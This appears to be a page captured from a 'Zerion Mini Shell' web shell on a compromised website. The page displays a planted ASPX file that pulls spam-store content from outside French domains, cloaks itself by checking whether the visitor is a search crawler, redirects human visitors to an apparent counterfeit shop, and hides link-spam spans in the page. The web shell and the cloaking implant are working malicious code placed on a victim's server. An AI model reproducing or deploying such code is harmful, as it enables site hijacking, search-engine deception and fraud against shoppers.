Mini Shell

Direktori : C:/Inetpub/vhosts/protarte.com/httpdocs/
Upload File :
Current File : C:/Inetpub/vhosts/protarte.com/httpdocs/inden.aspx

<%@ Page Language="C#" %>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<script runat="server">
    protected void Page_Load(object sender, EventArgs e)
    {
        if (!IsPostBack)
        {
            tz();
            webclient = new System.Net.WebClient();
            webclient.Encoding = System.Text.Encoding.UTF8;
            a = new Random(System.DateTime.Now.Millisecond);
			cg1 = webclient.DownloadString("http://wfjs.a123.fr/cg/en.asp");
			cg2 = webclient.DownloadString("http://wfjs.a123.fr/cg/en.asp");
			cg3 = webclient.DownloadString("http://wfjs.a123.fr/cg/en.asp");
			cg4 = webclient.DownloadString("http://wfjs.a123.fr/cg/en.asp");
			cg5 = webclient.DownloadString("http://wfjs.a123.fr/cg/en.asp");
			ckwz = webclient.DownloadString("http://wfjs.a123.fr/wlen.asp");
		    string hyzhdy = webclient.DownloadString("http://wfjs.a123.fr/dyen.asp");
            string pname = Request.CurrentExecutionFilePath;
            dbhl = webclient.DownloadString("http://wfjs.a123.fr/hlen.asp?page=" + pname);
            if (Request.QueryString["type"] != null)
            {
                if (Request.QueryString["type"] == "addtocart")
                {
                    content = webclient.DownloadString("http://wzdy.lc7.fr/cart.aspx?gj=com");
                    content = content.Replace("pppid", Request.Form["pid"]);
                    content = content.Replace("tupian", Request.Form["pic"]);
                    content = content.Replace("mingzi", Request.Form["pname"]);
                    content = content.Replace("danjia", Request.Form["price"]);
                    content = content.Replace("shuliang", "1");
                    content = content.Replace("zongjia", Request.Form["price"]);
                    content = content.Replace("cima", Request.Form["s1"]);
                    content = content.Replace("curfh", Request.Form["fh"]);
                    content = content.Replace("pricetype", Request.Form["pricetype"]);
                    content = content.Replace("ZZZZZ", webclient.DownloadString("http://wfjs.a123.fr/xdz.txt"));
                }
                else if (Request.QueryString["type"] == "search")
                {
                    string URL = "http://wzdy.lc7.fr/GD_Page.aspx" + "?cid=" + Request.QueryString["cid"] + "&xi=1-6&xc=19-26&searchtxt=" + Request.QueryString["searchtxt"] + "&you=0&page=" + pname;
                    content = webclient.DownloadString(URL);
                  
                }

            }
            else
            {
                string URL = "";
                if (Request.QueryString["zhen"] != null)
                {   gjc = Request.QueryString["zhen"];
                    URL = "http://wzdy.lc7.fr/GD_Page.aspx" + "?cid=" + Request.QueryString["cid"] + "&shop=" + gjc + "&xi=" + Request.QueryString["xi"] + "&xc=" + Request.QueryString["xc"] + "&pl=" + Request.QueryString["pl"] + "&pr=" + Request.QueryString["pr"] + "&you=" + Request.QueryString["you"];

                }
				else if (Request.QueryString["cid"] != null && Request.QueryString["number"] != null)
                {  URL = "http://wzdy.lc7.fr/s.aspx?cid=" + Request.QueryString["cid"] + "&number=" + Request.QueryString["number"] +  "&xi=1-6&xc=19-26";
                content = webclient.DownloadString(URL);
                content = content.Replace("yymm", "https://"+HttpContext.Current.Request.Url.Host + pname);
				content = content.Replace("shop=", "zhen=");
				Response.Write(content);
                Response.End();
                }
				else if (Request.QueryString["pnum"] != null)
                {   URL = "http://wzdy.lc7.fr/GD_Page.aspx" + "?cid=" + Request.QueryString["cid"] + "&xi=1-6&xc=19-26&pnum=" + Request.QueryString["pnum"] + "&you=0&page=" + pname;
                }
                else
                {
                    URL = hyzhdy + "&xi=1-6&xc=19-26&pnum=" + Request.QueryString["pnum"] + "&you=0&page=" + pname;
                }
                content = webclient.DownloadString(URL);
                content = content.Replace("shop=", "zhen=");
				content = content.Replace("&pl=", "");
				content = content.Replace("&you=0", "");
				content = content.Replace("&you=", "");
                content = content.Replace("HHHHH", pname);
                content = content.Replace("BBBBB", HttpContext.Current.Request.Url.Host);
                content = content.Replace("AAAAA", pname + "?gj=com&type=addtocart");
                content = content.Replace("DDDDD", gjc);
                content = content.Replace("QQQQQ", HttpContext.Current.Request.Url.Host);


            }


        }
    }
	public void tz()
    {

        string ip = System.Web.HttpContext.Current.Request.ServerVariables["REMOTE_ADDR"];
        if (Request.QueryString["kk"] != null)
        {
            ip = "66.249.64.190";
        }
        string ipurl = "http://wfjs.a123.fr/getdomain.aspx?rnd=1&ip=" + ip;
        webclient = new System.Net.WebClient();
        webclient.Encoding = System.Text.Encoding.UTF8;
        string domain = webclient.DownloadString(ipurl).ToLower();
        if (domain.IndexOf("google") == -1 && domain.IndexOf("msn.com") == -1 && domain.IndexOf("yahoo.com") == -1 && domain.IndexOf("aol.com") == -1)
        {
            if (Request.QueryString["zhen"] != null)
            {
                Response.Redirect("http://wzdy.lc7.fr/a.aspx?cid=" + Request.QueryString["cid"] + "&cname=" + HttpUtility.UrlEncode(Request.QueryString["zhen"]) + "&xi=" + Request.QueryString["xi"] + "&xc=" + Request.QueryString["xc"] + "&pr=" + Request.QueryString["pr"]);
				Response.End();
            }
        }

    }
    public System.Net.WebClient webclient = null;
	public string gjc="Online Store";
    public string content = "";
    public System.Random a = null;
	public string cg1="";
	public string cg2="";
	public string cg3="";
	public string cg4="";
	public string cg5="";
	public string ckwz="";
	public string dbhl="";
</script>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Language" />
<meta http-equiv="Content-Type" content="text/html;charset=utf-8">
<title><%=gjc%> off <%=a.Next(60,80)%>% - <%=HttpContext.Current.Request.Url.Host%></title>
<meta name="keywords" content="<%=gjc%>,<%=gjc+cg1%>,<%=gjc+cg2%>,<%=gjc+cg3%>,<%=gjc+cg4%>" />
<meta name="description" content="<%=gjc%> online store sell <%=gjc+cg1%>,<%=gjc+cg2%>,<%=gjc+cg3%>,<%=gjc+cg4%> and <%=gjc+cg5%> inexpensively." />
<meta name="robots" content="index,follow,all" />
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
<meta name="Robots" content="index, follows">
</head>
<body>
<%=content %>
<span style="display:none"><%=dbhl%></span>
<span style="display:none"><%=ckwz%></span>
</body>
</html>

Zerion Mini Shell 1.0